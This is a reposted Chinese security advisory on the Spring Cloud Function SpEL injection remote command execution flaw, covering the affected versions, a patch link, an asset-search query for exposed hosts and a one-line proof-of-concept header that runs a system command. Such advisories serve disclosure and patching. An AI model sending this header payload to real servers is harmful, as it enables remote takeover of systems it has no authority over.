Spring Cloud Function SPEL 远程命令执行漏洞

admin 2022年3月27日02:03:53安全漏洞评论795 views1095字阅读3分39秒阅读模式

Spring Cloud Function SPEL 远程命令执行漏洞

点击蓝字 关注我们

Spring Cloud Function SPEL 远程命令执行漏洞


声明

本文作者:CKCsec安全研究院
本文字数:482

阅读时长:5 分钟

项目/链接:文末获取

本文属于【CKCsec安全研究院】原创文章,未经许可禁止转载

Spring Cloud Function SPEL 远程命令执行漏洞

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

Spring Cloud Function 是基于Spring Boot 的函数计算框架,通过对传输细节和基础架构进行抽象,为开发人员保留熟悉的开发工具和开发流程,使开发人员专注在实现业务逻辑上,从而提升开发效率。

访问Spring Cloud Function的 HTTP请求头中存在 spring.cloud.function.routing-expression参数,其 SpEL表达式可进行注入攻击,并通过 StandardEvaluationContext解析执行。最终,攻击者可通过该漏洞进行远程命令执行。

风险等级

影响版本

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

注:部分版本进行特定配置的动态路才会受该漏洞影响!

资产确定

app="vmware-SpringBoot-framework“

漏洞复现

「POC」

https://github.com/hktalent/spring-spel-0day-poc

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc")
Spring Cloud Function SPEL 远程命令执行漏洞

修复建议

目前Spring Cloud官方已经推出补丁修复漏洞,受影响用户可以通过官方补丁进行修复。

官方链接:

https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f

另外关注公众号后台回复“0112”可免费获取代码审计教程后台回复“0110”获取红队攻防内部手册

下面就是团队的公众号啦,老铁来都来了点波关注叭!

上面教程仅供个人学习交流,旨在为网络安全发展贡献力量,切勿用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。以上教程来源于网络,版权归原作者所有,如有侵权,请联系删除。


原文始发于微信公众号(CKCsec安全研究院):Spring Cloud Function SPEL 远程命令执行漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月27日02:03:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Spring Cloud Function SPEL 远程命令执行漏洞 https://cn-sec.com/archives/843415.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: